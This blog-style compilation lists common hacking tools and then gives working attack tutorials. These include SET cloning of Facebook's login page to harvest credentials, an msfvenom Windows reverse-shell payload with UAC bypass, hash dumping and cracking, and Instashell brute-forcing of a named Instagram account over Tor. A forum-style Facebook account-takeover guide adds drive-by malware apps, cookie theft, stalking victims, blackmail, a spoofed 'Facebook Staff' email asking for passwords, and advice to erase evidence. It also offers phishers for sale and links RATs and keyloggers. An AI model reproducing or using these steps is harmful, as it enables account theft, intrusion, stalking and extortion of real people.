just wanna say here that I am ready to provide assistance to Iraqi companies by securing their sites and applications with the latest protection methods and technologies with a free trial for small package of security features including me and my full software engineering team time.

We contract with large companies like Facebook, twitter, snapchat to secure their programs, so we do not need money from Iraqi companies greatly, but nevertheless we will be very lenient with you guys.

Today, The team of Superman competes professionally in security conferences.

We are back to dash the hopes of the Black Hats. #AhmedAlghaleb

for business try to contact me directly using my verified social media lists on my website only. https://ahmedalghaleb.me/info

This is part of my collection in pentagram for how to Protect your mobile phone.

https://www.instagram.com/p/CFP5wLaBMoY/

Ever since you enter the field of Ethical Hacking, you always want to have your hands get on most of the Hacking Tools. More tools you know, more your hacking career is about to fly off. So let’s discuss the best 7 hacking tools.

1.) Nmap

It is a free and open-source tool that is used for network discovery and security auditing.

Nmap is a powerful tool as it can be used to scan huge networks having thousands of machines. It is a command-line tool. Nmap suite also includes an advanced GUI that is called “ZenMap”.

It supports a wide range of operating system which are:

• Linux
• Microsoft Windows
• FreeBSD
• OpenBSD
• Solaris
• IRIX
• Mac OS X

It uses raw IP packets to determine:

• Hosts that are available on a particular network
• Services that are offered by these hosts i.e. Application name along with its versions
• Operating system and its version that is running on the target system
• Type of firewall on the target system
• Scans for the open ports using both TCP and UDP protocols

Nmap download link:

https://nmap.org/download.html

2.) Metasploit

It is basically a Security Assessment and Penetration Testing tool. Metasploit can be used to launch an attack on other systems with it.

It uses a vulnerable system on which security testing can be conducted in order to exploit the flaws in the system.

Metasploit can be implemented as follows:

• Initially, TCP port scanning is done to obtain information about the target system.
• Host lists and services running on them can be viewed and analyzed in the project view.
• Now the vulnerability scan is run on the target system’s data which enlist the flaws within the system.
• This information can be used for planning the attack on the target system.

Metasploit download link:

https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

3.) Angry IP Scanner

It is one of the fastest IP addresses and port scanner. By using this hacker can easily gather information about open ports in the target system.

It pings each Ip address in the target system to check whether it’s alive. Further, it resolves the hostnames, determines the MAC address.

Features:

• It also extracts the NetBIOS information which includes services related to the session layer in the OSI model which are workgroup names and current active users.
• Scanned results can be saved in CSV, TXT, XML or IP-Port list files.
• It can gather any information about scanned IP’s as it uses plugins.
• If anyone can write plugins, he can efficiently extend the functionality of Angry IP Scanner.

Angry IP Scanner download link:

https://angryip.org/download/#windows

4.) Nikto

It is a webserver assessment tool. Nikto is an open-source platform that performs tests against Web Servers to find various vulnerable files, misconfigurations, outdated servers and programs on that web server.

It relies on HTTP response to determine whether a page or script exists on the target.

Features:

• Provides HTTP proxy support.
• Checks for the outdated server components.
• It can scan multiple ports on the server.
• Guesses credentials for authorization with trying many different ID and Password combinations.
• Reports for the unusual headers.

Nikto download link:

https://github.com/sullo/nikto

5.) John the Ripper

JTR is free and open-source software that is widely used by hackers for password cracking. It uses the various cryptanalysis attacks such as “Dictionary Attack” and “Brute-Force Attack”.

It also comes with the commercial version as well i.e. “John the Ripper Pro.” It is a more user-friendly version providing more functionality in password cracking at the enterprise level.

John the Ripper working:

• Initially get the hashed password that has to be cracked.
• We need to have a wordlist of expected passwords in our system as it makes the password cracking job easier.
• Next, we enter the valid John the Ripper command that will be extracting the password from the hashed password given as an input.

The rate at which the password will be cracked depends completely on the strength of the password and the available wordlist. It keeps trying to crack the password continuously until the termination command is not given.

John the Ripper download link:

https://www.openwall.com/john/

6.) Wireshark:

It is an open-source tool that is used to capture traffic on the network. It is basically a network protocol analyzer tool.

Wireshark helps in:

• Sniffing for the passwords.
• Capturing all the packets over the network.
• Identifying the source and destination IP address of the traffic.
• Next, we enter the valid John the Ripper command that will be extracting the password from the hashed password given as an input.

It also captures HTTP packet transmission over the network. Click on “Follow TCP connection” in the HTTP packet. Now you can see the username and passwords that are captures over the network.

Wireshark download link:

https://www.wireshark.org/#download

7.) Burp Suite:

It is an integrated platform that is used for performing a test on web application security.

It provides a wide range of tools that are used from initial mapping to exploiting the vulnerabilities in the applications. Once the flaws are detected hackers can use it to break into the security of the system. Burp Suite comes in three editions:

1. Community Edition: Can be downloaded free of charge
2. Professional Edition: Best tool for Penetration Testers and Bug Bounty Hunters
3. Enterprise Edition: Used by an organization.

Burp Suite features:

• It can be used to launch attacks on Web Applications. It can test and detect Cross-site scripting (XSS) and SQL injection.
• It operates as a web proxy server which helps in allowing interception, inspection, and modification of network traffic.

Burp Suite download link:

https://portswigger.net/burp

Share To Your Friends And Learn Together With Us

Facebook Hack By Social Engineering Toolkit (SET)

Hack Facebook with Social Engineering, you can apply this method to hack Instagram accounts as well. But this tutorial is focused exclusively on how to hack Facebook accounts on Kali Linux with the Social Engineering Toolkit. But if you have just a little imagination you can apply the same steps you will learn in this tutorial and duplicate the process to hack another account for another website as well. Is pretty much the same with just a few small variations.

What Is Social Engineer Toolkit (SET)

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering . SET has been given at large-scale conferences together with Blackhat, DerbyCon, Defcon, and ShmooCon. With over 2 million downloads, SET is that the standard for social-engineering penetration tests and supported heavily within the protection community.

It is an application used by pen testers, hackers etc… it can be found in Kali Linux, parrot-sec, backbox and different pentesting OS otherwise you can install by downloading from github or simply type in terminal apt search set toolkit or search in synaptic for synaptic type in terminal synaptic otherwise you have not installed then type apt-get install synaptic then open synaptic look for set toolkit then right click on set and mark for installation then click on apply it will automatically install set for you.

What are Social Engineering Attacks ?

Social Engineering attacks are the various cons used by the hackers to trick people into providing sensitive data to the attackers. There are various type of social engineering attacks, some of the popular attacks are :-

• Phishing
• IVR or phone phishing
• Baiting
• Spear phishing

What you will need:

• Kali Linux
• A little background on Networking and its terms (Private vs Public IPs esp.) would be good.
• You should be online.

In the last decade, there were major hacks and leaks in social media platforms like Twitter, Facebook , LinkedIn and several others. currently the social media platforms take security very seriously and it has become very tough to hack directly into social media platforms, currently the hackers have moved the focus towards Social Engineering Attacks.

Lets start with Hack Facebook using SEToolKit (Phishing attack)

Step 1 : Once you have installed SEToolkit, open up bash and type setoolkit.

Step 2 :Once SET is loaded it will show few options as shown in the image below. Select "Social-Engineering Attacks" by entering "1" and hit enter.

Step 3 :We will be greeted with a screen similar to this that has many different attacks.

I will be guiding you through one of the most effective options: Website Attack Vectors. Pretty much everyone who has used a computer has used the Internet, and pretty much everyone on the Internet will click on a link . Social Engineering is a society like Facebook or Twitter, but can also be as simple as, well, a link. SEToolkit helps you abuse that trust people have on the Internet, so not only do you have over 5 billion targets, but you can also recognize attacks like these.

Type 2 and press [Enter] to continue.

Step 4 :We now have a list of 7 different attack vectors, all very effective. The 3 most effective vectors are the Credential Harvester, Metasploit Browser, and Java Applet Attack. Lets say that you want to get your friends Facebook login. By choosing Credential Harvester Attack Method, SEToolkit will copy any website you want and add a credential stealing code to the HTML.

Type 3 and press [Enter] to continue.

Step 5 :Type 2 for Site Cloner.

Step 6 :In this step, it will ask for your IP address, if you are running the attack on LAN you can provide your internal IP address and if you are executing the attack on WAN then you have to provide your external IP address. In this article, we will be executing the attack on LAN, to check you internal IP address run "ifconfig". Enter your IP address and hit enter.

Step 7 :Type Kali Linux I.P Address.(Now copy your Ip address to first Terminal)

Step 8 :(Now Enter url of site which you want to clone):we are cloning/phishing https://www.facebook.com/ this will take a little bit time……

Step 9 :As victim will go on link he will get login in page and what the victim will type we will get in our harverster file created in directory….

Open the Kali Linux I.P in your tageted system .Here i am opened in my Window 7 Browser in VMware Workstation.

Step 10 :Now I will go back to Kali Linux and check if we have successfully harvested the login details.

Step 11 :We have successfully stolen the Facebook login credentials from the target machine. And also Credential has been successfully saved in the /root/set/set.template

We have successfully stolen the Facebook login credentials from the target machine.

Few tips to be safe while browsing always check the address bar when you login into any website. As in the tutorial above if we have checked the address bar we would have known that its a fake login page.

Make it work over internet

To make the technique work over internet, you will need to use your public IP instead of private. Search google for what is my IP to find you public IP. Then use it. You can use tinyurl or something to make the url appear legitimate. Also, port forwarding might need to be enabled, as your router might block traffic on port 80. Firewall can also cause troubles. While this tutorial was nothing more than se-toolkit 1 2 3 [your IP] [facebook.com], the next post on getting your credential harvestor on the internet will make the tutorial complete and useful in practical sense.

Share To Your Friends And Learn Together With Us

Hacking System With Kali Linux. This Tutorial Is Only For Educational Purpose.

What Is System Hacking?

Illegal way to access someone’s computer that’s call system hacking a hacker hack the system using the malware, payload, and virus, Some hacking types are perfectly legal, One of the most important methods used by hackers in order to circumvent the standard authentication is password cracking.

It is actually the very first step in the system hacking process. a hacker needs to physically access the target system and inject the payload target system. Let’s try some example

Windows System Hacking

First we create a payload using the metasploit framework simple run the command. payload is the part of transmitted data that is the actual intended message.

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.20.10.103 lport=4545 -f exe > hackNos.exe

Parameter uses

• -p Payload to use
• lhost Attacker IP address
• lport Attacker listing port
• -f Output formate
• > Payload output filename

and we start our Metasploit payload listener and load the module multi handler

our TCP handler is start now we start any server I use python SimpleHTTPServer for transferring our payload target system.

python -m SimpleHTTPServer 80

open any browser and download the payload target system

our download is complete now click the open button and execute the payload

Now we have meterpreter shell target machine run the sysinfo command it’s output show about system information.

sysinfo

we move on our next step dump all hashes but first, we migrate our payload with another running process ps command is show all running process target machine

ps
migrate 4040

and run the getsystem command for administrator account access and we face a error priv_elevate_system we have now permission for administrator account access we can bypass the error using the post exploitation moudule

get system
background

Post exploitation

run the session in background and load the module bypassuac_eventvwr and set the session name

use exploit/windows/local/bypassuac_eventvwr
set session 1
run

and new meterpreter session is open again run the getsystem command our command is run successfully

getsystem
hashdum

Window hash Cracking

save the hash in a file and using the john tool we can crack the hash –word lists choose your word-lists path

cat hash.txt
john --wordlists=/usr/share/wordlists/rockyou.txt --format=NT hash.txt

Share To Your Friends And Learn Together With Us

For Learning Hacking And Python Tutorials, Join Our Hacking And Python Tutorials account on Instagram by searching for #AHMEDALGHALEB

Thanks for watching it. your hero #AhmedAlghlaleb

http://vpswala.org/
http://ohosti.com/vpshosting.php
https://gratisvps.net/
https://my.letscloud.io/sign-up/
https://developer.rackspace.com/
https://www.vultr.com/
https://www.ionos.com/enterprise-cloud
https://www.cloudsigma.com/
https://www.digitalocean.com/
http://ezywatch.com/freevps/
https://yellowcircle.net/
https://www.ctl.io/free-trial/
https://www.ihor.ru/
https://www.neuprime.com/l_vds3.php
https://www.apponfly.com/en/
https://www.skysilk.com/
https://sadd.io/
https://vps.apponfly.com/

Instashell is originally coded by thelinuxchoice

Try this for testing purpose only cause sometimes it’s no longer working :)

STEP 1

• Open Terminal in Kali Linux and type following command to create and open new Directory

mkdir bruteforce
cd bruteforce

STEP 2

• Clone InstaShell Source code from GitHub
• It will download all Source code in your

git clone https://github.com/F33Z/instashell.git

STEP 3

• It will create new Directory so let's open it by typing following command

cd instashell/

STEP 4

• Change file permission using the following command
• If you don’t change permission it won’t run

chmod +x ./instashell.sh

STEP 5

• To do attack first it needs to start TOR service
• To start TOR service type following command

service tor start

STEP 6

• Let’s start Instagram password Brute Force attack
• Type following command

./instashell.sh

STEP 7

• Now enter victim Username, word list, and set Threads value
• Create a custom password list for the victim using cupp
• Or use default password list
• In default password list it won’t work
• The custom password list can increase chances

Username account: itmefeez
Password List: /root/pass.txt
Threads:  500

STEP 8

• if you have perfect password list than it will guess password used by a victim
• If the password list is larger than it will need more time passion

CONCLUSION

• It won’t work all the time but having some information of victim can increase the success rate
• Next, we learn how to generate custom password list using CUPP
• Don’t forget to Spread The World

I made this tutorial a while back on the deep web but someone posted it on google so I decided to release it to you guys as well! They are doing this for a lot of my tutorials so expect a few more!

let's start my sweetheart's fans,

Once again I am back to write more on Facebook to include other methods.

Please don't leech my tutorials. I work my ass off putting these tutorials together and I deserve all the credit.

I have already written 3 tutorials on Facebook, and you should definitely read all of them since I will include some information that has already been mentioned on them.

Bypassing FB security w/ Pics

[Tutorial] Why you shouldn't phish, keylog, SE on FB.

How to hack FB [Detailed Tut]

Updates will be necessary in the future.

I felt that I merely stated the tools to use on my last tutorial, so on this tutorial I wanted to focus a bit more on how to think through the process like a hacker.

I don't like to spoon-feed the steps since I prefer to allow people to use their brains to think on their own, but I understand that not every person has experience with the computer realms and therefore I must be more detailed on my explanations.

Let's get started.

I will cover the following information:

• 1) Other forms of Hacking Facebook accounts, other than the typical suggestions of RATs, Keyloggers, Phishers, and so on...
• 2) Hacking Facebook accounts wirelessly
• 3) Footprinting your victim
• 4) How you have to think
• 5) Spoofing e-mails to the victim (Use direct URL)
• 6) Slightly re-touch RATs, keyloggers, Phishers because I have already explained in-dept on my other tutorial.

Let's jump into it.

1) Other forms of hacking Facebook accounts, other than the typical suggestions of RATs, Keyloggers, Phishers, and so on...

On my last tutorial on here.
How to hack Facebook [Highly detailed Tutorial] - Updated methods Re-UPDATED 1/24/11

I focused on these subjects.

1) Key loggers
2) Rats
3) Phishing (Well, not really.)
4) Social Engineering
5) How not to get traced
6) Regaining Access - New Retrieval method

But now for this particular on this new tutorial, I would like to mention how to integrate these kinds of malware into better use to be more efficient in your results.

1. Infected Facebook Applications aka "Drive bys"

2. Flooding their walls.

A shout to those two guys for coming up with those tutorials since they appeared to be extremely useful for stealing a Facebook accounts.

1. How can this particular application be useful?

To put it simple, what this application does is it allows you to set up something known as a "drive by" within the Facebook applications where someone enters the application and asks them to accept the application to start.

Once they select Run on the pop up, they can be infected with either a RAT, keylogger, stealer, etc...

You should go on the thread of Endax's for more details on how to set it up.

This particular approach is useful simply because everything looks very innocent and the target is likely to fall for it with a higher risk than the other typical forms of attacks.

2. Flooding their walls.

Now you might imagine that once you have an application that has the potential of infecting your victim, how are you going to convince your target to try out your application?

It's simple, simply name the application based on what your target likes. The customization is mentioned more on Endax's thread, so again look into it for more details.

You can spam the hell out of the walls using T0X1CV1RU5's method or you can simply send an innocent message.

Flooding their walls is also useful if you want to visit a particular website that has the potential of infecting as well.

If you need drive-bys, you can see use these.

(Click here to view)

(Click here to view)

2) Hacking Facebook accounts wirelessly

1. Surprisingly, I have not seen a single person here on any other communities suggesting this method and yet it's so simple.

Hacking Facebook accounts through a wireless connection is simple, but unfortunately by "wirelessly" I am referring only if you are under the same wifi or under the same network.

It will save lots of time explaining, if I use a video that has been made. So, here it is a good video explaining everything.

Just a side note is to make sure that you get Firefox: 3.6.12

Be sure to click on the descriptions on that video to see where you can download the tools.

2. Stealing Cookies

If you watched the video that I posted above, you undestand how Facebook works by storing cookies on your computer.

You can also steal cookies through a different form, such as this explained on this tutorial.
[TUT] How to steal cookies (Easy)! [/TUT]

The "cookie" is basically the piece of file that maintains the records that you have done on your account. If you get access to these cookies, you can log in as whoever you want.

3) Footprinting your victim

What is Footprinting?

Basically it's collecting information about your target's computer and themselves.

Personally, I like to open a text editor and save any information I can find about them so I do not forget about it if I need use of it in the future.

http://en.wikipedia.org/wiki/Footprinting

To put it in the most simplistic language, it's stalking your victim for information that you can use in order to gain access.

Information such as Age, Date of Birth, Place of Birth, Parents names, Sibling names, family names, pet names, e-mail are the most common information that you can possible acquire.

Websites such as:

• http://com.lullar.com/
• http://www.pipl.com/email/
• http://www.spokeo.com
• http://www.emailfinder.com
• http://www.411.com/
• http://www.ask.com/
• http://www.bebo.com/
• http://www.facebook.com/
• http://www.flickr.com/
• http://www.ip-adress.com/ipaddresstolocation/
• http://www.myspace.com/
• http://www.myyearbook.com/
• http://www.searchenginez.com/findpeople.html
• http://www.skipease.com/
• http://www.sonico.com/
• http://www.spock.com/
• http://www.twitter.com/
• http://www.usatrace.com/
• http://www.whitepages.com
• http://www.whois.com/
• http://www.whois.net/
• http://www.wink.com/
• http://www.youtube.com
• http://www.zabasearch.com/
• http://www.zoominfo.com

Make it extremely easy to search names, e-mails, etc to dig information about whoever you want. There are more websites in which I personally use to dig information about people, but I will not mention them since I do not want the news station going crazy on a new rage of identity exposers.

Again, I have written tutorials on this subject on how to protect your identity online.

The tutorial itself can be used to test the information of others as well without their acknowledgement.

The tutorials are here:
How to protect your identity online [Part 1/2] [Extremely DETAILED]
How to protect your identity online [Part 2/2][Extremely DETAILED]

All the information that you are able to collect, save it on a text editor such as notepad and save the information.

Do you have the IP of the target?

You can dig more information with the IP adddress. Information that can be very useful, incase if you want to blackmail.

You can read on the subject more in details on this tutorial of mine.
How to track Hackers and attacks Part 1/2 [Super detailed]
How to track Hackers and attacks Part 2/2 [Super detailed]

I covered all the things that you can do with an IP to collect more information regarding your target.

4) How you have to think

This is the classic part of every hacking process.

Any time you want to hack anything, you need the following things:

1) You need a plan
2) You need a strategy
3) You need executions
4) You need results
5) You need to clean up all the evidence

You need to know how to do Social Engineering like a hacker would. Social engineering itself takes lots of clear thinking and noticing every single detail to the point of perfection.

I posted an E-book on the subject if you want to learn like a professional.
The Art Of Human Hacking

You can't simply lie to someone's face online or offline because people aren't exactly stupid.

You have to think exactly what you want to say and how to say it.

You need to know what your target likes, what your target is likely to fall gullible for, what your target dislikes, what your target wants, what your target hates or love, etc...

The other most common form is creating a bogus fake profile and adding them through Facebook by posing as an attractive female or male, depending on what gender they are and their sexuality.

5) Spoofing e-mails to the victim (Use direct URL or Phisher)

Tut on spoofing

This is another form of attack that you can take to fool your target into believing that you are Facebook staff.

Using spoofed e-mails, you can send an e-mail as whoever you want.

E-mail spoofer

Get your self a webhosting and upload the file to use it.

http://www.000webhost.com/

You can use that particular Spoofer that I use. It's someone's scripting, but I edit it slightly so it doesn't go into spam.

You can send them an e-mail such as this:

Quote:
Hello **,
Your account has had multiple login attempts from Sandusky, Ohio, and we want to verify that your account is safe.
We will need to verify through a few questions.
What is your D.O.B?

What is your confirmation phone number?

What is your current password?

What passwords have you recently changed?

Thank you for your cooperation.
Sincerely,
Facebook Staff.

Again, the spoofed e-mail is using Social Engineering to fool the target. You can customize your fake e-mail message however you want.

I can sell you a Facebook phisher for $10, send me a PM if anyone is interested.

That is what you will get for $10, so you can just send them a fake URL using http://dot.tk

Basically, you will see free hosting from 000webhost and then shorten your URL using http://dot.tk

To anything you want like, for example:

http://facebook.tk

You will receive logs like these.
Spoiler (Click to View)

6) Slightly re-touch RATs, keyloggers, Phishers because I have already explained in dept on my other tutorial. (On other forums (deepweb i will be posting more here soon)

1) Keyloggers

If you want a keylogger, you can contact me or use google!

I personally recommend this really good keylogger if you want to spend a bit of extra money with assistance included.

http://refriedstudios.com/

Buy now, the best keylogger and RAT in the market for a good price with a lot help included!

2) RATs

I see the same question all the time, Which is the best/favorite RAT?

-Based on my personal experience, I can say that DarkComet and Cybergate are the best for RATs being free.

You can find DarkComet here: http://darkcomet-rat.com/
You can find CyberGate here: http://website.cybergate-rat.org/mainpage/

I will not go into teaching you how to set those up because there are already a ton of tutorials on how to do that.

3) Phishers

Can't go into the conversations of Phishers since it's against the rules. If you want to buy the one I offer, send me a PM.

I want to say that you should definitely without a doubt read my other threads if you want to make any progress taking over any account. I consider this tutorial alone rather vague simply because I have already explained in more details on the other threads. Be sure to scroll up at the very top for the links.

Today my sweetheart's fans I will share with you a list of best major social networks.

🕸 Draugiem Latvia
🕸 Facebook
🕸 Facenama Iran
🕸 Google+
🕸 Instagram
🕸 Linkedin
🕸 Mixi Japan
🕸 Odnoklassniki Russia
🕸 Pinterest
🕸 Qzone China
🕸 Reddit
🕸 Taringa Latin America
🕸 Tinder
🕸 Tumblr
🕸 Twitter
🕸 Weibo China
🕸 VKontakte
🕸 Xing